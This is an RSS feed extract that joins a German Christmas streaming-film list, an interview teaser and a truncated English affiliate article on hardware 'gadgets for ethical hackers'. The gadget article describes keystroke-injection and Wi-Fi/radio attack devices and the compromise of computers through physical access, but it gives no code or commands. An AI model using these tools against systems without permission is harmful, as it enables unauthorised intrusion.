<p>Disney+ hat die beiden Weihnachtskomödien für die ganze Familie aus den Jahren 1990 und 1992 im Programm. <a rel="nofollow" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" data-type="URL" data-id="https://www.disneyplus.com/de-de/movies/kevin-allein-zu-haus/3v4vqKPG2jSr" target="_blank">“Kevin allein zu Haus”</a> erzählt die Geschichte des achtjährigen Kevin McCallister der von seiner Familie zu Weihnachten allein zuhause vergessen wird. Während Kevin anfänglich seine Freiheiten genießt, muss er bald das Haus gegen zwei tollpatschige Einbrecher verteidigen, die in dem Anwesen fette Beute wittern. Im Nachfolger <a rel="nofollow" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" data-type="URL" data-id="https://www.disneyplus.com/de-de/movies/kevin-allein-in-new-york/3gjRdWD3Yks3" target="_blank">“Kevin allein in New York“</a> geht bei der Weihnachtsreise seiner Familie wieder etwas schief und der Knirps landet versehentlich allein in New York anstatt wie ursprünglich geplant in Florida. In weihnachtlichen Metropole gibt es dann auch ein Wiedersehen mit den Gaunern aus dem ersten Teil.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure><h2>Stirb langsam (Disney+)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Disney+ ansehen</a></p>


<p>Ebenfalls bei Disney+ im Stream gibt es den Action-Klassiker <a href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" data-type="URL" data-id="https://www.disneyplus.com/de-de/movies/stirb-langsam/1NWCEanaAK2b" target="_blank" rel="nofollow">“Stirb langsam“</a>. Im Film fliegt der New Yorker Polizist John McClane (Bruce Willis) an Weihnachten mit Geschenken zu seiner Frau und seinen Kindern nach Los Angeles. Eigentlich will er über die ruhigen Feiertage seine Ehe retten, doch schon kurz nach seiner Landung kommt alles anders als geplant. Als er seine Frau von einer Firmenfeier im Nakatomi-Tower abholen will, stürmen Terroristen das Gebäude und nehmen alle Mitarbeiter als Geiseln. Nun liegt es an McClane, die Terroristen aufzuhalten und seine Frau Holly zu retten.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure><h2>Charlie und die Schokoladenfabrik (Netflix)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-7-0-0&amp;url=https://www.netflix.com/de/title/70021648" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Netflix ansehen</a></p>


<p>In Tim Burtons Interpretation des Kinderbuch-Klassikers gewinnt der junge Charlie Bucket eine goldene Eintrittskarte für die erstaunlichste Schokoladenfabrik aller Zeiten, die er zusammen mit seinem Großvater und vier anderen Kindern besuchen darf. Durch die wundersame Fabrik führt der Betreiber selbst – der exzentrische Willy Wonka (Johnny Depp). Für Tim Burton war <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-1-0-0&amp;url=https://www.netflix.com/de/title/70021648" data-type="URL" data-id="https://www.netflix.com/de/title/70021648" target="_blank" rel="nofollow">“Charlie und die Schokoladenfabrik“</a> bereits die zweite Verfilmung eines Buchs von Roald Dahl und die fünfte Zusammenarbeit mit Hauptdarsteller Johnny Depp.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure><h2>Tim Burton’s The Nightmare before Christmas (Disney+)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Disney+ ansehen</a></p>


<p>Wundersam geht es auch im zweiten <a rel="nofollow" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" data-type="URL" data-id="https://www.disneyplus.com/de-de/movies/tim-burtons-the-nightmare-before-christmas/5GjwOj5Rkpz2" target="_blank">Tim Burton-Film</a> in unseren Empfehlungen zu. Hauptfigur des Stop-Motion-Musicals aus dem Jahr 1993 ist der Kürbiskönig Jack Skellington. Gelangweilt von der Angst-und-Schrecken-Routine an Halloween beschließt Jack, Weihnachten zu übernehmen und den Weihnachtsmann zu ersetzen. Doch mit der neuen Besetzung gerät das Fest schnell aus den Fugen und hinterlässt verängstigte Kinder. Nun liegt es an Jacks Freundin Sally, Weihnachten zu retten.</p>



<h2>Tatsächlich … Liebe (Amazon Prime Video)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B00HUD1T2S?ascsubtag=6-1-1436753-7-0-0" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Prime Video ansehen</a></p>


<p>Romantisch wird es in <a rel="nofollow" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B00HUD1T2S?ascsubtag=6-1-1436753-1-0-0" data-type="URL" data-id="https://www.amazon.de/dp/B00HUD1T2S" target="_blank">“Tatsächlich … Liebe“</a> aus dem Jahr 2003. Der Film verfolgt das Leben von acht sehr unterschiedlichen Paaren, die sich in lose miteinander verbundenen Geschichten in einem hektischen Monat vor Weihnachten in London mit ihrem Liebesleben auseinandersetzen. So verspürt etwa Englands Premierminister Zuneigung zu einer Mitarbeiterin, zwei Pornodarsteller müssen ihre Schüchternheit überwinden und ein verstörter Schriftsteller findet erst in der Ferne sein Glück. Zu sehen sind unter anderem Hugh Grant, Laura Linney, Colin Firth und Liam Neeson.</p>



<h2>Better Watch Out (Amazon Prime Video, Netflix)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B0B8R3JRFX?ascsubtag=6-1-1436753-7-0-0" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Prime Video ansehen</a></p>

<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-7-0-0&amp;url=https://www.netflix.com/title/80191638" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Netflix ansehen</a></p>


<p>In einem US-amerikanischen Vorort geht es in der Horror-Komödie <a rel="nofollow" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B0B8R3JRFX?ascsubtag=6-1-1436753-1-0-0" data-type="URL" data-id="https://www.amazon.de/dp/B0B8R3JRFX" target="_blank">“Better Watch Out“</a> spannend zu. Der Film erzählt die Geschichte der jungen Babysitterin Ashley (Olivia DeJonge), die bei ihrem Job eigentlich einen ruhigen Abend erwartet hatte. Doch im Laufe der Nacht muss sie den ihr anvertrauten 12-jährigen Luke gegen brutale Einbrecher verteidigen. Schon wenig später muss die unerschrockene Ashley jedoch feststellen, dass es sich nicht um einen normalen Einbruch handelt – spannende Wendungen garantiert.</p>



<h2>Schöne Bescherung (Amazon Prime Video)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B00HX1BO7W?ascsubtag=6-1-1436753-7-0-0" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Prime Video ansehen</a></p>


<p>Einen absoluten Weihnachts-Komödien-Klassiker hält Amazon Prime Video mit <a href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B00HX1BO7W?ascsubtag=6-1-1436753-1-0-0" data-type="URL" data-id="https://www.amazon.de/dp/B00HX1BO7W" target="_blank" rel="nofollow">“Schöne Bescherung“</a> bereit. In dem Film aus dem Jahr 1989 artet das geplante große Weihnachtsfest der Familie Griswold zu einer riesigen Katastrophe aus. Bei Familienvater Clark (Chevy Chase) geht bei den Vorbereitungen für das große Familien-Weihnachtsfest wirklich alles schief, was für zahllose irrwitzige Situationen sorgt. Clarks ständiges Pech wird durch seine unausstehlichen Familiengäste im Verlauf des Films noch verschlimmert. Der Familienvater versucht jedoch unermüdlich, sein Bestes zu geben.</p>



<h2>Der Grinch (Netflix)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-7-0-0&amp;url=https://www.netflix.com/de/title/60000901" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Netflix ansehen</a></p>


<p>Neben Chevy Chase schafft es auch Jim Carrey in unsere Empfehlungen für die besten Weihnachtsfilme. Er spielt als grüner Weihnachtshasser <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-1-0-0&amp;url=https://www.netflix.com/de/title/60000901" data-type="URL" data-id="https://www.netflix.com/de/title/60000901" target="_blank" rel="nofollow">Grinch</a> ein einsames und mürrisches Wesen. Um Weihnachten zu verhindern, stiehlt er an Heiligabend Weihnachtsgeschenke aus der nahe gelegenen Stadt Whoville. Dabei erkennt der mürrische grüne Kobold jedoch, dass es an Weihnachten nicht nur um Geld und Geschenke geht, die Liebenswürdigkeit der kleinen Cindy Lou Who und ihrer Familie bringt selbst das härteste Herz zum Schmelzen.</p>



<h2>Disneys Eine Weihnachtsgeschichte (Disney+)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Disney+ ansehen</a></p>


<p>Wie schon in “Der Grinch“ zeigt sich Jim Carry auch in <a rel="nofollow" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" data-type="URL" data-id="https://www.disneyplus.com/de-de/movies/disneys-eine-weihnachtsgeschichte/QnakzyiFzOeP" target="_blank">“Disneys Eine Weihnachtsgeschichte“</a> von seiner mürrischen Seite. Als alter Ebenezer Scrooge lässt er seine Launen an seinem treuen Schreiber (Gary Oldman) und seinem fröhlichen Neffen (Colin Firth) aus. Als ihn die drei Geister der Weihnacht auf eine Reise zu einer Wahrheit mitnehmen, die er nicht sehen will, muss er sein Herz öffnen und alle Bosheit wiedergutmachen, bevor es zu spät ist.</p>



<h2>Drei Haselnüsse für Aschenbrödel (Netflix, Amazon Prime Video)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/dp/B09NRN7NFG?ascsubtag=6-1-1436753-7-0-0" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Prime Video ansehen</a></p>

<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-7-0-0&amp;url=https://www.netflix.com/de/title/60028616" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Netflix ansehen</a></p>


<p>Der DEFA-Klassiker <a rel="nofollow" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-1-0-0&amp;url=https://www.netflix.com/de/title/60028616" data-type="URL" data-id="https://www.netflix.com/de/title/60028616" target="_blank">“Drei Haselnüsse für Aschenbrödel“</a> aus dem Jahr 1973 darf in den Weihnachtsfilm-Empfehlungen natürlich nicht fehlen. Der Film erzählt die Geschichte von Aschenbrödel, die bei ihrer Stiefmutter und ihren Stiefschwestern lebt und dort wie eine Magd behandelt wird. Eines Tages erhält sie vom Kutscher einen Zweig mit drei Haselnüssen, die ihr drei Wünsche erfüllen sollen. Als der Prinz einen großen Ball gibt, soll Aschenbrödel zuhause bleiben. Mit Hilfe ihrer Zaubernüsse gelangt das Mädchen aber doch auf den Ball und gewinnt das Herz des Prinzen. Ihre Liebe droht jedoch an der Gehässigkeit ihrer Stiefschwestern zu scheitern.</p>



<p>Welche Weihnachtsfilme die drei großen Streaming-Anbieter noch bereitstellen, sehen Sie in der folgenden Übersicht:</p>



<p><strong>Netflix:</strong></p>



<ul><li>​​​Single All The Way</li><li>A Castle For Christmas</li><li>Office Christmas Party</li><li>Die Familie Claus 1-2</li><li>David &amp; die Weihnachtselfen</li><li>Die Highligen Drei Könige</li><li>Weihnachten in der Wildnis</li><li>Verrückte Weihnachten</li><li>Falling For Christmas</li><li>Christmas With A View</li><li>A California Christmas: City Lights</li><li>Una Navidad no tan padre</li><li>1000 km weit weg von Weihnachten</li><li>Christmas Under Wraps</li><li>Arthur Weihnachtsmann</li><li>The Noel Diary</li><li>Guillermo del Toros Pinocchio</li><li>Holidate</li><li>Alles Gute kommt von oben</li><li>Jingle Jangle Journey</li><li>Drei Haselnüsse für Aschenbrödel</li><li>Die Hüter des Lichts</li><li>Better Watch Out</li><li>Klaus</li><li>A Christmas Prince 1-3</li><li>The Knight Before Christmas</li><li>Charlie und die Schokoladenfabrik</li><li>Der Grinch</li><li>Prinzessinnentausch</li><li>Prinzessinnentausch: Wieder vertauscht</li><li>Prinzessinnentausch: Auf der Jagd nach dem Stern</li><li>Dolly Parton’s Christmas on the Square</li><li>The Christmas Chronicles</li><li>The Christmas Chronicles: Teil zwei</li></ul><p><strong>Amazon Prime Video:</strong></p>



<ul><li>Better Watch Out</li><li>Süße Weihnachten</li><li>Last Christmas</li><li>Der Grinch</li><li>Elliot, das kleinste Rentier</li><li>New York Christmas – Weihnachtswunder gibt es doch!</li><li>Drei Haselnüsse für Aschenbrödel (per Freevee)</li><li>Liebe braucht keine Ferien</li><li>Tatsächlich… Liebe</li><li>Schöne Bescherung</li><li>Bridget Jones – Schokolade zum Frühstück</li><li>Bridget Jones – Am Rande des Wahnsinns</li><li>Christmas Planner</li><li>Eine Hochzeit zu Weihnachten</li></ul><p><strong>Disney+:</strong></p>



<ul><li>Disney’s Eine Weihnachtsgeschichte</li><li>Das Wunder von Manhatten</li><li>Santa Clause 1-3</li><li>Schöne und das Biest: Weihnachtszauber</li><li>Annie</li><li>Muppets – Eine Weihnachtsgeschichte</li><li>Wenn Träume wahr werden</li><li>Das ultimative Weihnachtsgeschenk</li><li>Kevin – Allein zu Haus</li><li>Kevin – Allein in New York</li><li>Noelle</li><li>Tim Burton’s The Nightmare before Christmas</li></ul><category>Streaming Media</category></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exclusive Talk with Patrick Elliot, CEO and CoFounder of VisualCortex]]></title>
<description><![CDATA[Patrick Elliot Patrick Elliot joined VisualCortex in April 2021 to lead the creation, development and global expansion of the company. Patrick is a veteran of the enterprise technology industry, having led teams across Canada, USA, Europe and Asia Pacific. Over the last two decades, Patrick has b...]]></description>
<link>https://tsecurity.de/de/1731064/ai-nachrichten/exclusive-talk-with-patrick-elliot-ceo-and-cofounder-of-visualcortex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1731064/ai-nachrichten/exclusive-talk-with-patrick-elliot-ceo-and-cofounder-of-visualcortex/</guid>
<pubDate>Tue, 13 Dec 2022 17:31:37 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="696" height="398" src="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png" class="attachment-large size-large wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png 700w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-300x171.png 300w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-150x86.png 150w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-696x398.png 696w" sizes="(max-width: 696px) 100vw, 696px" data-attachment-id="29708" data-permalink="https://www.marktechpost.com/2022/12/13/exclusive-talk-with-patrick-elliot-ceo-and-cofounder-of-visualcortex/interview-10/" data-orig-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png" data-orig-size="700,400" data-comments-opened="1" data-image-meta='{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}' data-image-title="Interview" data-image-description="" data-image-caption="" data-medium-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-300x171.png" data-large-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png"><img width="150" height="150" src="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-150x150.png 150w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-80x80.png 80w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-70x70.png 70w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-24x24.png 24w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-48x48.png 48w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-96x96.png 96w, https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-300x300.png 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="29708" data-permalink="https://www.marktechpost.com/2022/12/13/exclusive-talk-with-patrick-elliot-ceo-and-cofounder-of-visualcortex/interview-10/" data-orig-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png" data-orig-size="700,400" data-comments-opened="1" data-image-meta='{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}' data-image-title="Interview" data-image-description="" data-image-caption="" data-medium-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview-300x171.png" data-large-file="https://www.marktechpost.com/wp-content/uploads/2022/12/Interview.png">Patrick Elliot Patrick Elliot joined VisualCortex in April 2021 to lead the creation, development and global expansion of the company. Patrick is a veteran of the enterprise technology industry, having led teams across Canada, USA, Europe and Asia Pacific. Over the last two decades, Patrick has been predominantly based in Sydney managing teams of salespeople and […]</p>
<p>The post <a rel="nofollow" href="https://www.marktechpost.com/2022/12/13/exclusive-talk-with-patrick-elliot-ceo-and-cofounder-of-visualcortex/">Exclusive Talk with Patrick Elliot, CEO and CoFounder of VisualCortex</a> appeared first on <a rel="nofollow" href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best 15 Gadgets For Ethical Hackers on Amazon 2022]]></title>
<description><![CDATA[Our in this platform we usually talk about various applications and their uses to check loopholes on systems. But penetration testers not only uses software applications, they also need some hardware to perform the tasks. In this detailed article we are going to cover hardware devices & gadgets u...]]></description>
<link>https://tsecurity.de/de/1718510/hacking/best-15-gadgets-for-ethical-hackers-on-amazon-2022/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1718510/hacking/best-15-gadgets-for-ethical-hackers-on-amazon-2022/</guid>
<pubDate>Sun, 04 Dec 2022 15:46:11 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Our in this platform we usually talk about various applications and their uses to check loopholes on systems. But penetration testers not only uses software applications, they also need some hardware to perform the tasks. In this detailed article we are going to cover <b>hardware devices &amp; gadgets used by an ethical hacker</b>. Let's start with a warning.</p><p><u><b>Warning:- This article is written for educational purpose only. To make it more ethical, we just only talk about the hardware devices publicly available in <a href="https://amzn.to/35I3hwb" target="_blank">Amazon</a>. Using these devices on our own for educational purpose isn't crime, but using these devices against others without proper permission is illegal. </b></u><span><u><b>So use these devices responsibly, we and Amazon will not be responsible for talking and selling these kind of product. </b></u><br></span></p><div class="separator"><a href="https://1.bp.blogspot.com/-5fSXpCtW3JI/YNXSYjK2XoI/AAAAAAAAFgY/bL4DvxjbCeMBh_BSs6Li53I4wRpeEV59wCLcBGAsYHQ/s500/hardwaresforhacker.gif"><img alt="Hardwares and gadgets used by hackers" border="0" data-original-height="303" data-original-width="500" height="194" src="https://1.bp.blogspot.com/-5fSXpCtW3JI/YNXSYjK2XoI/AAAAAAAAFgY/bL4DvxjbCeMBh_BSs6Li53I4wRpeEV59wCLcBGAsYHQ/w320-h194/hardwaresforhacker.gif" title="Hardwares and gadgets used by hackers" width="320"></a></div><p>Lets start with a computer, most of cybersecurity experts prefer laptops, not desktops because laptops are portable. We had wrote an entire article about <a href="https://www.kalilinux.in/2021/01/best-laptop-for-kali-linux.html" target="_blank">best laptops for Kali Linux</a>, Moving forward ethical hackers uses some other hardware devices that is our main topic for today.</p><h1><a href="https://amzn.to/2TQIl3i" target="_blank"><span>1. Raspberry Pi 4</span></a><br></h1><p>Raspberry Pi dominating the market of single board computers (SBC). This device used by almost every security personals.</p><p></p><div class="separator"><a href="https://amzn.to/2TQIl3i" target="_blank"><img alt="Raspberry pi" border="0" data-original-height="372" data-original-width="500" height="149" src="https://1.bp.blogspot.com/-0EMSR1gMuX8/YNHURznRwqI/AAAAAAAAFe0/weutfncj2uIndmtERP72xXwbZAY5cRovACLcBGAsYHQ/w200-h149/raspberry%2Bpi.png" title="raspberr pi" width="200"></a></div><p></p><p></p>This is very useful we can install entire Kali Linux on this credit card sized computer. Raspberry Pi also can be used in many other projects. Cybersecurity experts use it on various way. We can see in Mr. Robot Season 1 Episode 5, how Elliot hacked the climate control network to destroy magnetic tapes.<p></p><div class="separator"></div><p>There are unlimited uses of raspberry pi for an ethical hacker. This device is a must have for everyone on infosec and programming field.</p><div class="separator"><a href="https://amzn.to/2TQIl3i" target="_blank"><img alt="buy Raspberry Pi on amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy Raspberry Pi on amazon" width="200"></a></div><h1><a href="https://amzn.to/3wEJedX" target="_blank"><span>2. Raspberry Pi Zero W</span></a></h1><div class="separator"><a href="https://amzn.to/3wEJedX" target="_blank"><img border="0" data-original-height="160" data-original-width="480" src="https://1.bp.blogspot.com/-6Umw9r5RMzc/YM3q2zOARII/AAAAAAAAFdY/PTNLbjVciRssdyAHulO5Dq_8jS3WIqz_gCLcBGAsYHQ/s320/Raspberry%2BPi%2BZero.png" width="320"></a></div><p>This is a small handheld computer, ideal for carrying the best penetration testing software tools, and to handle all the external hardware hacking tools. The most known Cybersecurity distro for it is P0wnP1 A.L.O.A. and Kali Linux. P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W. The successor of P4wnP1 is called <a href="https://github.com/mame82/P4wnP1_aloa" target="_blank">P4wnP1 A.L.O.A</a>. We recommend the USB type-A pongo-pin adapter shown in the above picture.</p><p>We also can use it a headless system (without monitor). This device connected with a power bank in our bag and we can control it from our mobile device on our hand(using VNC).</p><p><a href="https://amzn.to/3wEJedX" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a><br></p><h1><a href="https://amzn.to/3wLRIA8" target="_blank"><span>3. USB Rubber Ducky</span></a></h1><p></p><div class="separator"><a href="https://amzn.to/3wLRIA8" target="_blank"><img alt="usb rubber ducky" border="0" data-original-height="800" data-original-width="800" height="190" src="https://1.bp.blogspot.com/-128fHEEGg4E/YM86AkGmgiI/AAAAAAAAFdk/RcTQNzhkpDcBfwRgBfA16vJJlZ-zZ4eDwCLcBGAsYHQ/w200-h190/rubber_ducky_800x.png" title="usb rubber ducky" width="200"></a></div>USB Rubber ducky is created and developed by <a href="https://hak5.org/" target="_blank">Hak5</a>. Nearly every computing devices accepts human input from keyboards, hence the ubiquitous HID specification - or Human Interface Device. Keyboards announce themselves to computers as HID devices and are in turn automatically recognized and accepted.<br><br>The USB Rubber Ducky delivers powerful payloads in seconds by taking advantage of the target computers inherent trust all while deceiving humans by posing as an ordinary USB drive.<p></p><p>In simple words, if we plug it on a computer, the computer think it is a keyboard and it will inject (type, save and execute) our preset payload on the computer. There are <a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" target="_blank">lots of payload</a> available for this device. Also we can easily write our own code.<br></p><p>This is one of the bast way to compromise a system having physical access.</p><p><a href="https://amzn.to/3wLRIA8" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/3gOh7DP" target="_blank"><span>4. WiFi Pineapple</span></a></h1><p>The Wi-Fi pineapple is the original Wi-Fi attack tool developed by Hak5. There are three different models available from Hak5. They all are good, here we choose Mark VII model for it's value for money.</p><div class="separator"><a href="https://amzn.to/3gOh7DP" target="_blank"><img alt="Wifi pineeapple" border="0" data-original-height="895" data-original-width="908" height="197" src="https://1.bp.blogspot.com/-rZ4DRS-YpBM/YNAmXjkKHJI/AAAAAAAAFds/lFMiZFfTiXMJzrzeSVjvWjNpUsoodYWHwCLcBGAsYHQ/w200-h197/wifi%2Bpineapple.png" title="Wifi pineeapple" width="200"></a></div><p>This will automate the auditing of WiFi networks and saves the results. We can control it with awesome web based interface. This is really a very good product for security testing o wireless networks.</p><p><a href="https://amzn.to/3gOh7DP" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/3gPOjL2" target="_blank"><span>5. HackRF One</span></a></h1><p>HackRF One from Great Scott Gadgets is a Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz. Designed to enable test and development of modern and next generation radio technologies. We can read and manipulate radio frequencies using this device.<br></p><div class="separator"><a href="https://amzn.to/3gPOjL2" target="_blank"><img alt="hackrf one" border="0" data-original-height="471" data-original-width="498" height="189" src="https://1.bp.blogspot.com/-tAPAYEc4m_Q/YNAoakDD78I/AAAAAAAAFd0/85limtUhdIAjanZKaqOtd1Zmk18FULEewCLcBGAsYHQ/w200-h189/hackrf.png" title="hackrf one" width="200"></a></div><p>HackRF One is an open-source hardware platform that can be used as a USB peripheral or programmed for stand- alone operation. This SDR offers one important improvement compared to other cheap alternatives. But the Radio Frequency (RF) quality isn't good as expected.</p><p><a href="https://amzn.to/3gPOjL2" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" width="200"></a></p><h1><a href="https://amzn.to/2SiMs7X" target="_blank"><span>6. Ubertooth One</span></a><br></h1><p>Ubertooth One is the most famous Bluetooth hacking tool we can find on the market. It is an open source 2.4 GHz wireless development platform suitable for Bluetooth hacking. Commercial Bluetooth monitoring equipment can easily be priced at over $10,000 , so the Ubertooth was designed to be an affordable alternative platform for monitoring and development of new BT, BLE and similar wireless technologies.</p><p></p><div class="separator"><a href="https://amzn.to/2SiMs7X" target="_blank"><img alt="ubertooth" border="0" data-original-height="935" data-original-width="1500" height="124" src="https://1.bp.blogspot.com/-eMhExuRrZvQ/YNHgniogKnI/AAAAAAAAFe8/_43DIDaPPS0erWerIWtsRrimy7gNnPJIQCLcBGAsYHQ/w200-h124/ubertooth.png" title="ubertooth" width="200"></a></div>Ubertooth One is designed primarily as an advanced Bluetooth receiver, offering capabilities beyond that of traditional adapters, which allow for it to be used as a BT signal sniffing and monitoring platform. Although the device hardware will accommodate signal broadcasting, the firmware currently only supports receiving and minimal advertising channel transmission features.<br><p></p><div class="separator"><a href="https://amzn.to/2SiMs7X" target="_blank"><img alt="buy from amazon" border="0" data-original-height="326" data-original-width="820" height="80" src="https://1.bp.blogspot.com/-hQuSkq1R5LQ/XxBAuCZT0fI/AAAAAAAADDw/erd1yJPsgf0g9qUSYvhBhHLcYuNYbCyZACPcBGAYYCw/w200-h80/1594900524777.webp" title="buy from amazon" 